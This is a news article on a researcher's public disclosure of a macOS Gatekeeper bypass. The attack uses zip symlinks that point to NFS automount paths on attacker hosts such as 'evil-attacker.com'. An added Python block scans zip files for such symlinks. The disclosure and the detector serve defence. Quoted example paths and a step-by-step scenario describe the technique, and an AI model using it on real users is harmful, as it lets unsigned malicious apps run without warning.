Researcher exposes vulnerability in macOS Gatekeeper security mechanism
Security researcher Filippo Cavallarin has publicized what he says is a method to bypass the Gatekeeper security feature of macOS. The bypass remains unaddressed by Apple as of last week’s macOS 10.14.5 release.
Gatekeeper is a macOS security tool that verifies applications immediately after they are downloaded. This prevents applications from being run without user consent. When a user downloads an app from outside the Mac App Store, Gatekeeper is used to verify that the code has been signed by Apple. If the code has not been signed, the app won’t open without the user giving explicit permission.
Cavallarin writes on his blog, however, that Gatekeeper’s protection can be completely bypassed. In its current implementation, Gatekeeper treats both external drives and network shares as “safe locations,” which means it allows any application stored in those locations to run without checking the code again. He goes on to explain that a user can “easily” be tricked into mounting a network share, and that anything in that share can then pass Gatekeeper.
The security researcher explains:
The first legit feature is automount (aka autofs) that allows a user to automatically mount a network share just by accessing a “special” path, in this case, any path beginning with “/net/”.
For example ‘ls /net/evil-attacker.com/sharedfolder/’ will make the OS read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS.
The second legit feature is that zip archives can contain symbolic links pointing to an arbitrary location (including automount endpoints) and that the software on macOS that is responsible for decompressing zip files doesn’t perform any check on the symlinks before creating them.
An example of how this would work:
To better understand how this exploit works, let’s consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls (ex Documents -> /net/evil.com/Documents) and sends it to the victim.
The victim downloads the malicious archive, extracts it and follows the symlink.
Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this technique very effective and hard to spot.
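As an added defender-side example (not code from Cavallarin’s post or from the article), the following Python inspects a zip archive for symlink entries whose targets point outside the archive, in particular at an automount path under /net/, the combination described in the quote above. The archive it scans is constructed inline with a placeholder host; treating /Volumes/ as an external-drive prefix is an assumption.

```python
import io
import stat
import zipfile

# Prefixes Gatekeeper treats as "safe locations" per the article: /net/ for
# automounted network shares; /Volumes/ (external drives) is an assumption.
TRUSTED_LOCATION_PREFIXES = ("/net/", "/Volumes/")


def zip_symlink_entries(data: bytes):
    """Return (name, target) for every symlink entry in a zip archive.

    Zip stores a symlink as an ordinary entry whose Unix mode (upper 16 bits
    of external_attr) has S_IFLNK set; the entry body is the link target.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if stat.S_ISLNK(mode):
                target = zf.read(info).decode("utf-8", "replace")
                found.append((info.filename, target))
    return found


def suspicious_symlinks(data: bytes):
    """Flag symlinks that escape the extracted folder: absolute targets
    (especially automount / external-volume paths) or '..' traversal."""
    flagged = []
    for name, target in zip_symlink_entries(data):
        reasons = []
        if target.startswith(TRUSTED_LOCATION_PREFIXES):
            reasons.append("target is an automount/external-volume path")
        elif target.startswith("/"):
            reasons.append("absolute target")
        if ".." in target.split("/"):
            reasons.append("target climbs out of the archive directory")
        if reasons:
            flagged.append((name, target, "; ".join(reasons)))
    return flagged


def build_sample_archive() -> bytes:
    """Constructed sample input: one plain file plus one symlink entry whose
    target is an automount path with a placeholder host (not a real share)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "harmless text file\n")
        link = zipfile.ZipInfo("Documents")
        link.create_system = 3  # Unix: external_attr carries the file mode
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "/net/placeholder.invalid/Documents")
    return buf.getvalue()
```

Running `suspicious_symlinks(build_sample_archive())` flags the `Documents` entry, while the plain `readme.txt` entry is ignored because its mode is not a symlink.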
Cavallarin says that he informed Apple of this flaw on February 22nd, and that the company was supposed to address it with the release of macOS 10.14.5 last week. As of that release, however, the loophole remains unaddressed, and Cavallarin says Apple has stopped responding to his emails. He is publicizing the flaw today because the 90-day disclosure window he gave Apple has lapsed.
Watch a video demonstration of the flaw below: